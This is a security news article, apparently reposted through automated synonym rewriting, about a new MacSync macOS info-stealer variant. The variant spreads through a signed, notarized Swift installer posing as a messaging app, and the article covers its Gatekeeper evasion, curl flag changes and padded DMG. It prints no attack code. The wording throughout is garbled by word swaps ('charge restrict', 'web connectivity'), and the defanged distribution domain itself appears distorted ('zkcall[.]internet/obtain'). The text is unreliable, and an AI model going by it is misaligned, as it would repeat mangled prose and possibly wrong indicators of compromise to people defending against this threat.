Dec 24, 2025Ravie LakshmananMalware / Endpoint Safety
Cybersecurity researchers have found a brand new variant of a macOS info stealer referred to as MacSync that is delivered by way of a digitally signed, notarized Swift utility masquerading as a messaging app installer to bypass Apple’s Gatekeeper checks.
“In contrast to earlier MacSync Stealer variants that primarily depend on drag-to-terminal or ClickFix-style strategies, this pattern adopts a extra misleading, hands-off method,” Jamf researcher Thijs Xhaflaire mentioned.
The Apple machine administration agency and safety firm mentioned the newest model is distributed as a code-signed and notarized Swift utility inside a disk picture (DMG) file named “zk-call-messenger-installer-3.9.2-lts.dmg” that is hosted on “zkcall[.]internet/obtain.”
The truth that it is signed and notarized means it may be run with out being blocked or flagged by built-in safety controls like Gatekeeper or XProtect. Regardless of this, the installer has been discovered to show directions prompting customers to right-click and open the app – a typical tactic used to sidestep such safeguards. Apple has since revoked the code signing certificates.
The Swift-based dropper then performs a collection of checks earlier than downloading and executing an encoded script by a helper element. This contains verifying web connectivity, imposing a minimal execution interval of round 3600 seconds to implement a charge restrict, and eradicating quarantine attributes and validating the file previous to execution.
“Notably, the curl command used to retrieve the payload reveals clear deviations from earlier variants,” Xhaflaire defined. “Fairly than utilizing the generally seen -fsSL mixture, the flags have been break up into -fL and -sS, and extra choices like –noproxy have been launched.”
“These modifications, together with using dynamically populated variables, level to a deliberate shift in how the payload is fetched and validated, possible geared toward enhancing reliability or evading detection.”
One other evasion mechanism used within the marketing campaign is using an unusually giant DMG file, inflating its measurement to 25.5 MB by embedding unrelated PDF paperwork.
The Base64-encoded payload, as soon as parsed, corresponds to MacSync, a rebranded model of Mac.c that first emerged in April 2025. MacSync, per MacPaw’s Moonlock Lab, comes fitted with a fully-featured Go-based agent that goes past easy knowledge theft and permits distant command and management capabilities.
It is value noting that code-signed variations of malicious DMG recordsdata mimicking Google Meet have additionally been noticed in assaults propagating different macOS stealers like Odyssey. That mentioned, risk actors have continued to depend on unsigned disk photos to ship DigitStealer as just lately as final month.
“This shift in distribution displays a broader pattern throughout the macOS malware panorama, the place attackers more and more try and sneak their malware into executables which are signed and notarized, permitting them to look extra like professional purposes,” Jamf mentioned.
